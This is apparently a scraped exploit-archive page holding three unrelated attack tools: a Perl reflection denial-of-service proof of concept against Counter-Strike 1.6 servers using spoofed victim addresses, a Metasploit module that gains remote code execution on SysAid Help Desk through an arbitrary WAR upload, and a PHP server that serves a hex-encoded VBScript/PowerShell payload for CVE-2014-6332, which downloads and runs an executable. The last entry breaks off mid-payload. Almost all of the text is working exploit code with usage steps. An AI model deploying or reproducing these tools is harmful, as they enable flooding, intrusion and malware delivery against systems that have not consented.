#  of these programs is not Todor Donev's
#  responsibility.
#
#  Use at your own risk and educational 
#  purpose ONLY!
#
#  See also, UDP-based Amplification Attacks:
#  https://www.us-cert.gov/ncas/alerts/TA14-017A
#
#  # perl cstrike-drdos-poc.pl 46.165.194.16 192.168.1.10 27010
#  [ Counter-Strike 1.6 'GameInfo' query reflection dos poc
#  [ Sending GameInfo requests: 46.165.194.16 -> 192.168.1.10  
#  ^C
#
#  # tcpdump -i eth0 -c4 port 27010
#  tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
#  listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
#  00:00:00.000000 IP 192.168.1.10.31337 > masterserver.css.setti.info.27010: UDP, length 25
#  00:00:00.000000 IP masterserver.css.setti.info.27010 > 192.168.1.10.31337: UDP, length 1392
#  00:00:00.000000 IP 192.168.1.10.31337 > masterserver.css.setti.info.27010: UDP, length 25
#  00:00:00.000000 IP masterserver.css.setti.info.27010 > 192.168.1.10.31337: UDP, length 1392
#  4 packets captured
#  4 packets received by filter
#  0 packets dropped by kernel


use strict;
use Socket;
use warnings;
no warnings 'uninitialized';

print "[ Counter-Strike 1.6 \'GameInfo\' query reflection dos poc\n";
die "[ Sorry, must be run as root. This script use RAW Socket.\n" if ($< != 0);
my $css         = (gethostbyname($ARGV[0]))[4];         # IP Address Destination        (32 bits)
my $victim      = (gethostbyname($ARGV[1]))[4];         # IP Address Source             (32 bits)
my $port        = $ARGV[2] || '27015';                  # Int between 1 and 65535        Default: 27015
die "[ Port must be between 1 and 65535!\n" if ($port < 1 || $port > 65535);
if (!defined $css || !defined $victim) {
    print "[ Usg: $0 <cstrike server> <victim> <port>\n";
    print "[ Default port: 27015\n";
    print "[ <todor.donev\@gmail.com> Todor Donev\n";
    exit;
}

print "[ Sending GameInfo requests: $ARGV[0] -> $ARGV[1]\n";
socket(RAW, AF_INET, SOCK_RAW, 255)             || die $!;
setsockopt(RAW, 0, 1, 1)                        || die $!;
main();

    # Main program
sub main {
    my $packet;
    
    $packet = iphdr();
    $packet .= udphdr();
    $packet .= cshdr();
    # b000000m...
    send_packet($packet);
}

    # IP header (Layer 3)
sub iphdr {
    my $ip_ver         	= 4;                                    # IP Version 4                  (4 bits)
    my $iphdr_len      	= 5;                                    # IP Header Length              (4 bits)
    my $ip_tos         	= 0;                                    # Differentiated Services       (8 bits)
    my $ip_total_len   	= $iphdr_len + 20;                      # IP Header Length + Data      (16 bits)
    my $ip_frag_id     	= 0;                                    # Identification Field         (16 bits)
    my $ip_frag_flag   	= 000;                                  # IP Frag Flags (R DF MF)       (3 bits)
    my $ip_frag_offset 	= 0000000000000;                        # IP Fragment Offset           (13 bits)
    my $ip_ttl         	= 255;                                  # IP TTL                        (8 bits)
    my $ip_proto       	= 17;                                   # IP Protocol                   (8 bits)
    my $ip_checksum    	= 0;                                    # IP Checksum                  (16 bits)

    # IP Packet
	my $iphdr       = pack(
                        'H2 H2 n n B16 h2 c n a4 a4',
                        $ip_ver . $iphdr_len, $ip_tos, 
                        $ip_total_len, $ip_frag_id, 
                        $ip_frag_flag . $ip_frag_offset,
                        $ip_ttl, $ip_proto, $ip_checksum,
                        $victim, $css
                        );
                        return $iphdr;
}

    # UDP Header (Layer 4)
sub udphdr {
    my $udp_src_port	= 31337;                        # UDP Sort Port         (16 bits) (0-65535)
    my $udp_dst_port	= $port;                        # UDP Dest Port         (16 btis) (0-65535)
    my $udp_len		= 8 + length(cshdr());          # UDP Length            (16 bits) (0-65535)
    my $udp_checksum 	= 0;                            # UDP Checksum          (16 bits) (XOR of header)

    # UDP Packet
    my $udphdr		= pack(
			'n n n n',
			$udp_src_port, 
			$udp_dst_port,
			$udp_len, 
			$udp_checksum
			);
	return $udphdr;
}

   # Counter-Strike 'GameInfo' request 
sub cshdr {

#
# https://developer.valvesoftware.com/wiki/Server_queries
#
# https://developer.valvesoftware.com/wiki/Source_RCON_Protocol
# Requests
# The server responds to 5 queries:
#
#          A2S_INFO   'T' (0x54) 
#    Basic information about the server. 
#          A2S_PLAYER 'U' (0x55)  
#    Details about each player on the server. 
#          A2S_RULES  'V' (0x56) 
#    The rules the server is using. 
#          A2A_PING   'i' (0x69)
#    Ping the server. (DEPRECATED) 
# A2S_SERVERQUERY_GETCHALLENGE  'W' (0x57)
#    Returns a challenge number for use in the player and rules query. (DEPRECATED) 
#
# Queries should be sent in UDP packets to the listen port of the server. 
#
 
# 25 bytes - A2S_INFO
    my $query            = "\xff\xff\xff\xff\x54";      # 0000   ff ff ff ff 54 53 6f 75 72 63 65 20 45 6e 67 69  ....TSource Engi
       $query           .= "\x53\x6f\x75\x72\x63";      # 0010   6e 65 20 51 75 65 72 79 00                       ne Query.
       $query           .= "\x65\x20\x45\x6e\x67";	
       $query           .= "\x69\x6e\x65\x20\x51";	
       $query           .= "\x75\x65\x72\x79\x00";	

    my $cshdr            = pack('a*', $query);
return $cshdr;
}

sub send_packet {
    while(1){
    select(undef, undef, undef, 0.40);                  # Sleep 400 milliseconds
    send(RAW, $_[0], 0, pack('Sna4x8', AF_INET, 60, $css))  || die $!;
   }
}
HireHackking 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'zlib'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'        => "SysAid Help Desk 'rdslogs' Arbitrary File Upload",
      'Description' => %q{
        This module exploits a file upload vulnerability in SysAid Help Desk v14.3 and v14.4.
        The vulnerability exists in the RdsLogsEntry servlet which accepts unauthenticated
        file uploads and handles zip file contents in a insecure way. By combining both weaknesses,
        a remote attacker can accomplish remote code execution. Note that this will only work if the
        target is running Java 6 or 7 up to 7u25, as Java 7u40 and above introduces a protection
        against null byte injection in file names. This module has been tested successfully on version
        v14.3.12 b22 and v14.4.32 b25 in Linux. In theory this module also works on Windows, but SysAid
        seems to bundle Java 7u40 and above with the Windows package which prevents the vulnerability
        from being exploited.
      },
      'Author'       =>
        [
          'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          [ 'CVE', '2015-2995' ],
          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt' ],
          [ 'URL', 'http://seclists.org/fulldisclosure/2015/Jun/8' ]
        ],
      'DefaultOptions' => { 'WfsDelay' => 30 },
      'Privileged'  => false,
      'Platform'    => 'java',
      'Arch'        => ARCH_JAVA,
      'Targets'     =>
        [
          [ 'SysAid Help Desk v14.3 - 14.4 / Java Universal', { } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jun 3 2015'))

    register_options(
      [
        Opt::RPORT(8080),
        OptInt.new('SLEEP',
          [true, 'Seconds to sleep while we wait for WAR deployment', 15]),
        OptString.new('TARGETURI',
          [true, 'Base path to the SysAid application', '/sysaid/'])
      ], self.class)
  end


  def check
    servlet_path = 'rdslogs'
    bogus_file = rand_text_alphanumeric(4 + rand(32 - 4))

    res = send_request_cgi({
      'uri' => normalize_uri(datastore['TARGETURI'], servlet_path),
      'method' => 'POST',
      'vars_get' => {
        'rdsName' => bogus_file
      }
    })

    if res && res.code == 200
      return Exploit::CheckCode::Detected
    end
  end


  def exploit
    app_base = rand_text_alphanumeric(4 + rand(32 - 4))
    tomcat_path = '../../../../'
    servlet_path = 'rdslogs'

    # We need to create the upload directories before our first attempt to upload the WAR.
    print_status("#{peer} - Creating upload directory")
    bogus_file = rand_text_alphanumeric(4 + rand(32 - 4))
    send_request_cgi({
      'uri' => normalize_uri(datastore['TARGETURI'], servlet_path),
      'method' => 'POST',
      'data' => Zlib::Deflate.deflate(rand_text_alphanumeric(4 + rand(32 - 4))),
      'ctype' => 'application/xml',
      'vars_get' => {
        'rdsName' => bogus_file
      }
    })

    war_payload = payload.encoded_war({ :app_name => app_base }).to_s

    # We have to use the Zlib deflate routine as the Metasploit Zip API seems to fail
    print_status("#{peer} - Uploading WAR file...")
    res = send_request_cgi({
      'uri' => normalize_uri(datastore['TARGETURI'], servlet_path),
      'method' => 'POST',
      'data' => Zlib::Deflate.deflate(war_payload),
      'ctype' => 'application/octet-stream',
      'vars_get' => {
        'rdsName' => "#{tomcat_path}/tomcat/webapps/#{app_base}.war\x00"
      }
    })

    # The server either returns a 200 OK when the upload is successful.
    if res && res.code == 200
      print_status("#{peer} - Upload appears to have been successful, waiting #{datastore['SLEEP']} seconds for deployment")
      register_files_for_cleanup("tomcat/webapps/#{app_base}.war")
    else
      fail_with(Failure::Unknown, "#{peer} - WAR upload failed")
    end

    10.times do
      select(nil, nil, nil, 2)

      # Now make a request to trigger the newly deployed war
      print_status("#{peer} - Attempting to launch payload in deployed WAR...")
      res = send_request_cgi({
        'uri'    => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
        'method' => 'GET'
      })
      # Failure. The request timed out or the server went away.
      break if res.nil?
      # Success! Triggered the payload, should have a shell incoming
      break if res.code == 200
    end
  end
end
HireHackking 
#!/usr/bin/php
<?php
    # Title : Internet Download Manager - OLE Automation Array Remote Code Execution
    # Affected Versions: All Version
    # Founder : InternetDownloadManager
    # Tested on Windows 7 / Server 2008
    #
    #
    # Author      :   Mohammad Reza Espargham
    # Linkedin    :   https://ir.linkedin.com/in/rezasp
    # E-Mail      :   me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
    # Website     :   www.reza.es
    # Twitter     :   https://twitter.com/rezesp
    # FaceBook    :   https://www.facebook.com/mohammadreza.espargham
    #
    #
    # OleAut32.dll Exploit MS14-064 CVE2014-6332
    #
    #
    # 1 . run php code : php idm.php
    # 2 . open "IDM"
    # 3 . Form Menu -    Tasks --> Run Site Grabber
    # 4 . Enter any word "Start page/address"
    # 5 . Click Addvance
    # 6 . check "Enter Login and password manually at the following web page"
    # 7 . Enter your exploit link http://ipaddress:80/
    # 8 . Next -->  Next -->  Next -->  Next
    # 9 . Your Link Download/Execute on your target
    # 10 . Finished ;)
    #
    #
    #Demo : http://youtu.be/fAUAX7UjXLg
    
    $port=80; # Port Address
    $link="http://10.211.55.3/putty.exe"; # Your exe link
    
    $reza = socket_create(AF_INET, SOCK_STREAM, 0) or die('Failed to create socket!');
    socket_bind($reza, 0,$port);
    socket_listen($reza);
    print "    Mohammad Reza Espargham\n   www.reza.es\n\nYour Link = http://ipaddress:$port / http://127.0.0.1:$port\n\n";
    
    $msg =
    "\x3c\x68\x74\x6d\x6c\x3e\x0d\x0a\x3c\x6d\x65\x74\x61\x20\x68\x74\x74\x70\x2d\x65\x71\x75\x69\x76".
    "\x3d\x22\x58\x2d\x55\x41\x2d\x43\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x22\x20\x63\x6f\x6e\x74\x65".
    "\x6e\x74\x3d\x22\x49\x45\x3d\x45\x6d\x75\x6c\x61\x74\x65\x49\x45\x38\x22\x20\x3e\x0d\x0a\x3c\x68".
    "\x65\x61\x64\x3e\x0d\x0a\x3c\x2f\x68\x65\x61\x64\x3e\x0d\x0a\x3c\x62\x6f\x64\x79\x3e\x0d\x0a\x20".
    "\x0d\x0a\x3c\x53\x43\x52\x49\x50\x54\x20\x4c\x41\x4e\x47\x55\x41\x47\x45\x3d\x22\x56\x42\x53\x63".
    "\x72\x69\x70\x74\x22\x3e\x0d\x0a\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x72\x75\x6e\x6d\x75".
    "\x6d\x61\x61\x28\x29\x20\x0d\x0a\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20".
    "\x4e\x65\x78\x74\x0d\x0a\x73\x65\x74\x20\x73\x68\x65\x6c\x6c\x3d\x63\x72\x65\x61\x74\x65\x6f\x62".
    "\x6a\x65\x63\x74\x28\x22\x53\x68\x65\x6c\x6c\x2e\x41\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x22".
    "\x29\x0d\x0a\x63\x6f\x6d\x6d\x61\x6e\x64\x3d\x22\x49\x6e\x76\x6f\x6b\x65\x2d\x45\x78\x70\x72\x65".
    "\x73\x73\x69\x6f\x6e\x20\x24\x28\x4e\x65\x77\x2d\x4f\x62\x6a\x65\x63\x74\x20\x53\x79\x73\x74\x65".
    "\x6d\x2e\x4e\x65\x74\x2e\x57\x65\x62\x43\x6c\x69\x65\x6e\x74\x29\x2e\x44\x6f\x77\x6e\x6c\x6f\x61".
    "\x64\x46\x69\x6c\x65\x28\x27\x46\x49\x4c\x45\x5f\x44\x4f\x57\x4e\x4c\x4f\x41\x44\x27\x2c\x27\x6c".
    "\x6f\x61\x64\x2e\x65\x78\x65\x27\x29\x3b\x24\x28\x4e\x65\x77\x2d\x4f\x62\x6a\x65\x63\x74\x20\x2d".
    "\x63\x6f\x6d\x20\x53\x68\x65\x6c\x6c\x2e\x41\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x29\x2e\x53".
    "\x68\x65\x6c\x6c\x45\x78\x65\x63\x75\x74\x65\x28\x27\x6c\x6f\x61\x64\x2e\x65\x78\x65\x27\x29\x3b".
    "\x22\x0d\x0a\x73\x68\x65\x6c\x6c\x2e\x53\x68\x65\x6c\x6c\x45\x78\x65\x63\x75\x74\x65\x20\x22\x70".
    "\x6f\x77\x65\x72\x73\x68\x65\x6c\x6c\x2e\x65\x78\x65\x22\x2c\x20\x22\x2d\x43\x6f\x6d\x6d\x61\x6e".
    "\x64\x20\x22\x20\x26\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x2c\x20\x22\x22\x2c\x20\x22\x72\x75\x6e\x61".
    "\x73\x22\x2c\x20\x30\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x3c\x2f\x73".
    "\x63\x72\x69\x70\x74\x3e\x0d\x0a\x20\x0d\x0a\x3c\x53\x43\x52\x49\x50\x54\x20\x4c\x41\x4e\x47\x55".
    "\x41\x47\x45\x3d\x22\x56\x42\x53\x63\x72\x69\x70\x74\x22\x3e\x0d\x0a\x20\x20\x0d\x0a\x64\x69\x6d".
    "\x20\x20\x20\x61\x61\x28\x29\x0d\x0a\x64\x69\x6d\x20\x20\x20\x61\x62\x28\x29\x0d\x0a\x64\x69\x6d".
    "\x20\x20\x20\x61\x30\x0d\x0a\x64\x69\x6d\x20\x20\x20\x61\x31\x0d\x0a\x64\x69\x6d\x20\x20\x20\x61".
    "\x32\x0d\x0a\x64\x69\x6d\x20\x20\x20\x61\x33\x0d\x0a\x64\x69\x6d\x20\x20\x20\x77\x69\x6e\x39\x78".
    "\x0d\x0a\x64\x69\x6d\x20\x20\x20\x69\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e\x0d\x0a\x64\x69\x6d\x20".
    "\x20\x20\x72\x6e\x64\x61\x0d\x0a\x64\x69\x6d\x20\x20\x20\x66\x75\x6e\x63\x6c\x61\x73\x73\x0d\x0a".
    "\x64\x69\x6d\x20\x20\x20\x6d\x79\x61\x72\x72\x61\x79\x0d\x0a\x20\x0d\x0a\x42\x65\x67\x69\x6e\x28".
    "\x29\x0d\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x42\x65\x67\x69\x6e\x28\x29\x0d\x0a".
    "\x20\x20\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a".
    "\x20\x20\x69\x6e\x66\x6f\x3d\x4e\x61\x76\x69\x67\x61\x74\x6f\x72\x2e\x55\x73\x65\x72\x41\x67\x65".
    "\x6e\x74\x0d\x0a\x20\x0d\x0a\x20\x20\x69\x66\x28\x69\x6e\x73\x74\x72\x28\x69\x6e\x66\x6f\x2c\x22".
    "\x57\x69\x6e\x36\x34\x22\x29\x3e\x30\x29\x20\x20\x20\x74\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20".
    "\x65\x78\x69\x74\x20\x20\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x20\x65\x6e\x64\x20\x69".
    "\x66\x0d\x0a\x20\x0d\x0a\x20\x20\x69\x66\x20\x28\x69\x6e\x73\x74\x72\x28\x69\x6e\x66\x6f\x2c\x22".
    "\x4d\x53\x49\x45\x22\x29\x3e\x30\x29\x20\x20\x20\x74\x68\x65\x6e\x20\x0d\x0a\x20\x20\x20\x20\x20".
    "\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e\x20\x3d\x20\x43\x49\x6e".
    "\x74\x28\x4d\x69\x64\x28\x69\x6e\x66\x6f\x2c\x20\x49\x6e\x53\x74\x72\x28\x69\x6e\x66\x6f\x2c\x20".
    "\x22\x4d\x53\x49\x45\x22\x29\x20\x2b\x20\x35\x2c\x20\x32\x29\x29\x20\x20\x20\x0d\x0a\x20\x20\x65".
    "\x6c\x73\x65\x0d\x0a\x20\x20\x20\x20\x20\x65\x78\x69\x74\x20\x20\x20\x66\x75\x6e\x63\x74\x69\x6f".
    "\x6e\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x65".
    "\x6e\x64\x20\x69\x66\x0d\x0a\x20\x0d\x0a\x20\x20\x77\x69\x6e\x39\x78\x3d\x30\x0d\x0a\x20\x0d\x0a".
    "\x20\x20\x42\x65\x67\x69\x6e\x49\x6e\x69\x74\x28\x29\x0d\x0a\x20\x20\x49\x66\x20\x43\x72\x65\x61".
    "\x74\x65\x28\x29\x3d\x54\x72\x75\x65\x20\x54\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x6d\x79\x61".
    "\x72\x72\x61\x79\x3d\x20\x20\x20\x20\x20\x20\x20\x20\x63\x68\x72\x77\x28\x30\x31\x29\x26\x63\x68".
    "\x72\x77\x28\x32\x31\x37\x36\x29\x26\x63\x68\x72\x77\x28\x30\x31\x29\x26\x63\x68\x72\x77\x28\x30".
    "\x30\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72".
    "\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x0d\x0a\x20\x20\x20\x20\x20\x6d\x79\x61".
    "\x72\x72\x61\x79\x3d\x6d\x79\x61\x72\x72\x61\x79\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68".
    "\x72\x77\x28\x33\x32\x37\x36\x37\x29\x26\x63\x68\x72\x77\x28\x30\x30\x29\x26\x63\x68\x72\x77\x28".
    "\x30\x29\x0d\x0a\x20\x0d\x0a\x20\x20\x20\x20\x20\x69\x66\x28\x69\x6e\x74\x56\x65\x72\x73\x69\x6f".
    "\x6e\x3c\x34\x29\x20\x74\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x6f\x63\x75".
    "\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x22\x3c\x62\x72\x3e\x20\x49\x45\x22\x29\x0d\x0a\x20".
    "\x20\x20\x20\x20\x20\x20\x20\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x69".
    "\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e\x29\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x75\x6e".
    "\x73\x68\x65\x6c\x6c\x63\x6f\x64\x65\x28\x29\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
    "\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x20\x20\x0d\x0a\x20\x20".
    "\x20\x20\x20\x20\x20\x20\x20\x20\x73\x65\x74\x6e\x6f\x74\x73\x61\x66\x65\x6d\x6f\x64\x65\x28\x29".
    "\x0d\x0a\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x65\x6e\x64\x20\x69\x66\x0d".
    "\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69".
    "\x6f\x6e\x20\x42\x65\x67\x69\x6e\x49\x6e\x69\x74\x28\x29\x0d\x0a\x20\x20\x20\x52\x61\x6e\x64\x6f".
    "\x6d\x69\x7a\x65\x28\x29\x0d\x0a\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x61\x61\x28\x35\x29\x0d\x0a".
    "\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x61\x62\x28\x35\x29\x0d\x0a\x20\x20\x20\x61\x30\x3d\x31\x33".
    "\x2b\x31\x37\x2a\x72\x6e\x64\x28\x36\x29\x0d\x0a\x20\x20\x20\x61\x33\x3d\x37\x2b\x33\x2a\x72\x6e".
    "\x64\x28\x35\x29\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x0d\x0a\x66".
    "\x75\x6e\x63\x74\x69\x6f\x6e\x20\x43\x72\x65\x61\x74\x65\x28\x29\x0d\x0a\x20\x20\x4f\x6e\x20\x45".
    "\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x20\x20\x64\x69\x6d\x20".
    "\x69\x0d\x0a\x20\x20\x43\x72\x65\x61\x74\x65\x3d\x46\x61\x6c\x73\x65\x0d\x0a\x20\x20\x46\x6f\x72".
    "\x20\x69\x20\x3d\x20\x30\x20\x54\x6f\x20\x34\x30\x30\x0d\x0a\x20\x20\x20\x20\x49\x66\x20\x4f\x76".
    "\x65\x72\x28\x29\x3d\x54\x72\x75\x65\x20\x54\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x43".
    "\x72\x65\x61\x74\x65\x3d\x54\x72\x75\x65\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x45\x78\x69\x74\x20".
    "\x46\x6f\x72\x0d\x0a\x20\x20\x20\x20\x45\x6e\x64\x20\x49\x66\x20\x0d\x0a\x20\x20\x4e\x65\x78\x74".
    "\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x0d\x0a\x73\x75\x62\x20\x74".
    "\x65\x73\x74\x61\x61\x28\x29\x0d\x0a\x65\x6e\x64\x20\x73\x75\x62\x0d\x0a\x20\x0d\x0a\x66\x75\x6e".
    "\x63\x74\x69\x6f\x6e\x20\x6d\x79\x64\x61\x74\x61\x28\x29\x0d\x0a\x20\x20\x20\x20\x4f\x6e\x20\x45".
    "\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x20\x20\x20\x20\x20\x69".
    "\x3d\x74\x65\x73\x74\x61\x61\x0d\x0a\x20\x20\x20\x20\x20\x69\x3d\x6e\x75\x6c\x6c\x0d\x0a\x20\x20".
    "\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x32".
    "\x29\x20\x20\x0d\x0a\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3d\x30\x0d\x0a".
    "\x20\x20\x20\x20\x20\x61\x61\x28\x61\x31\x29\x3d\x69\x0d\x0a\x20\x20\x20\x20\x20\x61\x62\x28\x30".
    "\x29\x3d\x36\x2e\x33\x36\x35\x39\x38\x37\x33\x37\x34\x33\x37\x38\x30\x31\x45\x2d\x33\x31\x34\x0d".
    "\x0a\x20\x0d\x0a\x20\x20\x20\x20\x20\x61\x61\x28\x61\x31\x2b\x32\x29\x3d\x6d\x79\x61\x72\x72\x61".
    "\x79\x0d\x0a\x20\x20\x20\x20\x20\x61\x62\x28\x32\x29\x3d\x31\x2e\x37\x34\x30\x38\x38\x35\x33\x34".
    "\x37\x33\x31\x33\x32\x34\x45\x2d\x33\x31\x30\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x6d\x79\x64\x61".
    "\x74\x61\x3d\x61\x61\x28\x61\x31\x29\x0d\x0a\x20\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50".
    "\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x20\x20\x0d\x0a\x65\x6e\x64\x20\x66\x75".
    "\x6e\x63\x74\x69\x6f\x6e\x20\x0d\x0a\x20\x0d\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20".
    "\x73\x65\x74\x6e\x6f\x74\x73\x61\x66\x65\x6d\x6f\x64\x65\x28\x29\x0d\x0a\x20\x20\x20\x20\x4f\x6e".
    "\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x20\x20\x20\x20".
    "\x69\x3d\x6d\x79\x64\x61\x74\x61\x28\x29\x20\x20\x0d\x0a\x20\x20\x20\x20\x69\x3d\x72\x75\x6d\x28".
    "\x69\x2b\x38\x29\x0d\x0a\x20\x20\x20\x20\x69\x3d\x72\x75\x6d\x28\x69\x2b\x31\x36\x29\x0d\x0a\x20".
    "\x20\x20\x20\x6a\x3d\x72\x75\x6d\x28\x69\x2b\x26\x68\x31\x33\x34\x29\x20\x20\x0d\x0a\x20\x20\x20".
    "\x20\x66\x6f\x72\x20\x6b\x3d\x30\x20\x74\x6f\x20\x26\x68\x36\x30\x20\x73\x74\x65\x70\x20\x34\x0d".
    "\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6a\x3d\x72\x75\x6d\x28\x69\x2b\x26\x68\x31\x32\x30\x2b\x6b".
    "\x29\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28\x6a\x3d\x31\x34\x29\x20\x74\x68\x65\x6e".
    "\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6a\x3d\x30\x20\x20\x20\x20\x20".
    "\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x64".
    "\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x32\x29\x20\x20\x20\x20\x20".
    "\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x61\x61\x28\x61\x31\x2b\x32\x29\x28".
    "\x69\x2b\x26\x68\x31\x31\x63\x2b\x6b\x29\x3d\x61\x62\x28\x34\x29\x0d\x0a\x20\x20\x20\x20\x20\x20".
    "\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20".
    "\x61\x61\x28\x61\x30\x29\x20\x20\x0d\x0a\x20\x0d\x0a\x20\x20\x20\x20\x20\x6a\x3d\x30\x20\x0d\x0a".
    "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6a\x3d\x72\x75\x6d\x28\x69\x2b\x26\x68".
    "\x31\x32\x30\x2b\x6b\x29\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20".
    "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x45\x78\x69\x74\x20\x66\x6f\x72\x0d\x0a".
    "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x0d\x0a\x20\x20".
    "\x20\x20\x6e\x65\x78\x74\x20\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x32\x29\x3d\x31\x2e\x36\x39\x37".
    "\x35\x39\x36\x36\x33\x33\x31\x36\x37\x34\x37\x45\x2d\x33\x31\x33\x0d\x0a\x20\x20\x20\x20\x72\x75".
    "\x6e\x6d\x75\x6d\x61\x61\x28\x29\x20\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d".
    "\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x4f\x76\x65\x72\x28\x29\x0d\x0a\x20\x20\x20".
    "\x20\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x20".
    "\x20\x20\x20\x64\x69\x6d\x20\x74\x79\x70\x65\x31\x2c\x74\x79\x70\x65\x32\x2c\x74\x79\x70\x65\x33".
    "\x0d\x0a\x20\x20\x20\x20\x4f\x76\x65\x72\x3d\x46\x61\x6c\x73\x65\x0d\x0a\x20\x20\x20\x20\x61\x30".
    "\x3d\x61\x30\x2b\x61\x33\x0d\x0a\x20\x20\x20\x20\x61\x31\x3d\x61\x30\x2b\x32\x0d\x0a\x20\x20\x20".
    "\x20\x61\x32\x3d\x61\x30\x2b\x26\x68\x38\x30\x30\x30\x30\x30\x30\x0d\x0a\x20\x20\x20\x0d\x0a\x20".
    "\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30".
    "\x29\x20\x0d\x0a\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x20\x61\x62\x28\x61\x30\x29\x20\x20".
